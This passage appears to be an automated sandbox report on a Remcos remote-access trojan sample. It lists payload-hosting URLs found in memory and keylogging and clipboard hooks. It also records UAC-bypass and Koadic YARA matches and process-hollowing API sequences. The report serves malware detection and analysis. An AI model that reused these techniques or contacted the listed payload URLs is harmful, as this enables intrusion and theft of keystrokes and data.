                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/)hVS
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009BB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/D
                      Source: remcos.exe, 00000013.00000003.1914864143.000000000083A000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x989O9Y
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If59Adw
                      Source: remcos.exe, 00000013.00000002.1918208186.0000000000868000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mS7-09cDgh9l-spZEVYc4X4sz7LO4DIkbEuCnO10bm0osuWSl7tRLcAVFGx7-sRmq
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFoUs3a
                      Source: remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLCejbl
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS43X7
                      Source: remcos.exe, 00000013.00000003.1914864143.000000000081F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mBqG2XWpzBzSvN2kPaNUx-09fMnbsE2AbR6Fc3TpLJhs6tiT5fqXCxcWK4x98
                      Source: remcos.exe, 00000011.00000002.1739100863.00000000009CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mMFFkYYwN0t0OSAIBWRwi6fQ3Q4XNZ5ZTI7CjrOq6bQT78Okek-WvtG9h-If5
                      Source: fu56fbrtn8.exe, 00000000.00000002.1421024098.0000000000823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mcrmPTZ2L_86niwd7Bu_ffro-TLyMBDfLgpQuXM7S3NIuO87j54n8Dfi6-LFo
                      Source: remcos.exe, 00000010.00000002.1647920314.00000000008CC000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 00000010.00000003.1645700884.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4msMUOKNxzSXc79LnjXbgaTWjPZ-zo_lPFnd-m9JJcIecYw2VkvQ1RrP2qqhLC
                      Source: remcos.exe, 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oqgp5g.db.files.1drv.com:443/y4mzx7lSeeAwusg9Zi636Xfs7GnQpJEFwP-ghRD9wO-49fLPVE-Xv-39OCRs6SS
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/ew-preload-inline-2523c8c1505f1172be19.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/otel-logger-104bffe9378b8041455c.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-35de8a913e.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-async-styles.a903b7d0ab82e5bd2f8a.chunk.v7.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bootstrap-5e7af218e953d095fabf.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-3a99f64809c6780df035.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-bundle-994d8943fc9264e2f8d3.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-fluent~left-nav-rc.ac5cfbeadfd63fc27ffd.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-forms-group~mru~officeforms-group-forms~officeforms
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-left-nav-rc.68ab311bcca4f86f9ef5.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-mru.2ce72562ad7c0ae7059c.chunk.v7.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendor-bundle-ba2888a24179bf152f3d.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.169ce481376dceef3ef6.chunk.v7.c
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwa-vendors~left-nav-rc.b24d6b48aeb44c7b5bf6.chunk.v7.j
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/pwaunauth-9d8bc214ac.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedfontstyles-27fa2598d8.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/sharedscripts-939520eada.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticpwascripts-30998bff8f.js
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/bundles/staticstylesfabric-35c34b95e3.css
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/hero-image-desktop-f6720a4145.jpg
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/lockup-mslogo-color-78c06e8898.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/microsoft-365-logo-01d5ecd01a.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-apps-image-46596a6856.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/images/content/images/unauth-checkmark-image-1999f0bf81.png
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/officehome/thirdpartynotice.html
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_regular.woff2
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://res.cdn.office.net/officehub/versionless/webfonts/segoeui_semibold.woff2
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmp, fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmp, Cmzcxhwn.PIF, 00000008.00000002.1546049840.000000001406F000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://sectigo.com/CPS0
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?407dab52f7bc43350b5cde12afe93269
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://waw02prdapp02-canary.netmon.azure.com/apc/trans.gif?469316a07faf13c962eeef1395652e59
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://www.digicert.com/CPS0
                      Source: remcos.exe, 0000000B.00000002.1534062723.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: bhv3CFC.tmp.13.dr, bhv2770.tmp.9.drString found in binary or memory: https://www.office.com/
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49706 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49709 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49719 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49722 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 13.107.139.11:443 -> 192.168.2.8:49725 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568A2B8 SetWindowsHookExA 0000000D,1568A2A4,00000000
                      Source: C:\ProgramData\Remcos\remcos.exe | Windows user hook set: 0 keyboard low level C:\ProgramData\Remcos\remcos.exe
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568B70E OpenClipboard,GetClipboardData,CloseClipboard
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156968C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568A3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                      Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR

                      E-Banking Fraud

                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000013.00000003.1914864143.00000000007E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000008.00000002.1531336451.0000000000921000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000012.00000002.1787599140.0000000000608000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000010.00000003.1645700884.0000000000856000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000006.00000003.2204454326.000000000076F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.1739100863.00000000009D3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000011.00000002.1739100863.00000000009E1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.1421024098.000000000080D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: remcos.exe PID: 908, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: Cmzcxhwn.PIF PID: 2700, type: MEMORYSTR
                      Source: Yara match | File source: Process Memory Space: remcos.exe PID: 4692, type: MEMORYSTR
                      Source: Yara match | File source: C:\ProgramData\fgdghrd\logs.dat, type: DROPPED

                      Spam, unwanted Advertisements and Ransom Demands

                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569C9E2 SystemParametersInfoW
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AAC9E2 SystemParametersInfoW

                      System Summary

                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, type: DROPPED | Matched rule: Koadic post-exploitation framework BAT payload Author: ditekSHen
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: netutils.dll.0.dr | Static PE information: section name: .
                      Source: C:\ProgramData\Remcos\remcos.exe | Process Stats: CPU usage > 49%
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156932D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569BB35 OpenProcess,NtResumeProcess,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569BB09 OpenProcess,NtSuspendProcess,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFC3F8 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFC368 RtlInitUnicodeString,RtlDosPathNameToNtPathName_U,NtDeleteFile
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFC4DC RtlDosPathNameToNtPathName_U,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF7968 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFC3F6 RtlDosPathNameToNtPathName_U,NtCreateFile,NtWriteFile,NtClose
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF7966 GetModuleHandleW,GetProcAddress,NtAllocateVirtualMemory
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF7F48 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF7F46 CreateProcessAsUserW,GetThreadContext,NtReadVirtualMemory,NtUnmapViewOfSection,NtWriteVirtualMemory,NtWriteVirtualMemory,SetThreadContext,NtResumeThread
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_02E0C4DC NtOpenFile,NtReadFile
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_02E07968 NtAllocateVirtualMemory
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_02E07966 NtAllocateVirtualMemory
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_02D7C4DC NtOpenFile,NtReadFile
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_02D77968 NtAllocateVirtualMemory
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_02D77966 NtAllocateVirtualMemory
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AAD58F NtdllDefWindowProc_A,GetCursorPos,SetForegroundWindow,TrackPopupMenu,IsWindowVisible,ShowWindow,ShowWindow,SetForegroundWindow,Shell_NotifyIcon,ExitProcess,CreatePopupMenu,AppendMenuA
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AA32D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AABB35 OpenProcess,NtResumeProcess,CloseHandle
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AABB09 OpenProcess,NtSuspendProcess,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DFCA6C CreateProcessAsUserW,WaitForSingleObject,CloseHandle,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156967B4 ExitWindowsEx,LoadLibraryA,GetProcAddress
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AA67B9 ExitWindowsEx,LoadLibraryA,GetProcAddress
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE265E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0719
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE1362
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE134B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE10BD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE14BD
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE04A9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE049D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0485
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE20F2
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE10D5
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE10C9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE14C9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE102E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0425
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE2018
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0419
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE040D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0000
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE1045
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE09BC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE09B0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE09A4
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE11EA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE01DE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE153D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE0D38
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE1531
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE2953
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_3_02BE1549
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156BE558
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B74E6
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B8770
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B8168
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156D4159
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156C61F0
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569F0FA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156BE0CC
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156D332B
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156A739D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156BE2FB
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B7D33
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B6FEA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15693FCA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B5E5E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156A6E0E
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156BDE9D
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B3946
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156CD9C9
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156B78FE
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569DB62
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156A7BAF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_156A7A46
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE20C4
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_33A67194
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_33A5B5C1
                      Source: C:\ProgramData\Remcos\remcos.exe | Code function: 6_2_02DF20C4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_02D620C4
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC74E6
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14ACE558
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14ACDE9D
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC5E5E
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC6FEA
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC78FE
